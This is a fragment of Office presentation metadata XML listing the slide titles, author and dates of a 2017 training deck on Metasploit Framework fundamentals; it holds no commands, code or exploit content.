      <vt:lpstr>MSF Architecture</vt:lpstr>
      <vt:lpstr>Component Familiarity</vt:lpstr>
      <vt:lpstr>Initial Setup</vt:lpstr>
      <vt:lpstr>MSF Console - Navigation</vt:lpstr>
      <vt:lpstr>MSF Console - Navigation (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Navigation (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Navigation (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Navigation (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Navigation (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console - Using Exploits (continued)</vt:lpstr>
      <vt:lpstr>MSF Console – Firing The Missile!</vt:lpstr>
      <vt:lpstr>Bonus Console Commands</vt:lpstr>
      <vt:lpstr>Bonus Command: Advanced</vt:lpstr>
      <vt:lpstr>Bonus Command: Banner</vt:lpstr>
      <vt:lpstr>Bonus Command: setg</vt:lpstr>
      <vt:lpstr>Bonus Command: grep</vt:lpstr>
      <vt:lpstr>Bonus Command: {ANY OS COMMAND}</vt:lpstr>
      <vt:lpstr>Bonus Command: back</vt:lpstr>
      <vt:lpstr>Bonus Command: help</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Additional Resources</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/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Metasploit Framework (MSF) Fundamentals</dc:title>
  <dc:creator>Brian Mork</dc:creator>
  <cp:lastModifiedBy>Brian Mork</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-17T16:14:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-06T04:22:40Z</dcterms:modified>
</cp:coreProperties>
</file>